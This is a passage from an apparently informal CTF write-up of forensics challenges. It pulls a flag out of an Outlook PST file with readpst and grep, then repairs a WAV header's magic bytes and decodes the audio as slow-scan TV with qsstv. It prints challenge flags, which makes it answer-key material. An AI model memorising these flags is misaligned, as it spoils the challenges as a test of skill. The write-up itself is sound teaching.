HQ6{Hidden_in_the_hex_million_miles_away}

Copy and Paste it in a site and retrieve The flag !

That’s all

4.office Magic

Given:

[p4ul@j0ker office-magic]$ file *TakeThatDreamTrip!.pst: Microsoft Outlook email folder (>=2003)

TastyTreats.mdb: Microsoft Access Database

1. Just Extract the mails and files from pst file using libpst ( Lazy of Using Online tools! )

2. To Install

Arch = sudo pacman -Sy libpst libpst-docs

[p4ul@j0ker office-magic]$ readpst -S TakeThatDreamTrip\!.pst

Opening PST file and indexes...

Processing Folder "Inbox"
"Inbox" - 2 items done, 0 items skipped. [p4ul@j0ker office-magic]$ ls Outlook\ Data\ File

Inbox

Check out the files in the Directory, file no 2 contains a flag or Do grep in the Directory

[p4ul@j0ker Inbox]$ grep -r HQ6 2:Visit Our Site to choose from a wide array of options. Hurry to get
the coupon HQ6{Its_Couponing_Time} and avail additional benefits

That’s all!

5. Satellite Imagery
Given :

[p4ul@j0ker Satellite]$ file challenge challenge: data

• Nice , Lets Correct some Magic Bytes!

[p4ul@j0ker Satellite]$ xxd challenge |head00000000: 5229 4646 2400 0000 5740 5633 666d 7420
R)FF$...W@V3fmt
00000010: 1000 0000 0100 0200 80bb 0000 00ee 0200 ................
00000020: 0400 1000 6461 7461 c0a1 5a01 b007 0000 ....data..Z.....
00000030: e60e 0000 3315 0000 321a 0000 951d 0000 ....3...2.......

• Changes to Made : R)FF$…W@V3fmt => RIFF$…WAVEfmt

Let The Game begins

1. Listen , Guess a bit

2. They were mentioned some words like satellite , Image , Audio obviously Its sqqtv Time! .

Qsstv is a utility for dealing with slow scan television signals.

deb = apt install qsstvarch = sudo pacman -Sy qsstv

1. Open qsstv => Menu=> Options => Go to Configurtion

Do Tick on “from File” , so that every time when we open qsstv ,it will ask for a file to open
• Now Close and Reopen The qsstv .

• Give That wave file as input and get the result

--------------------------------------------------------------------------------------------------------------------------------------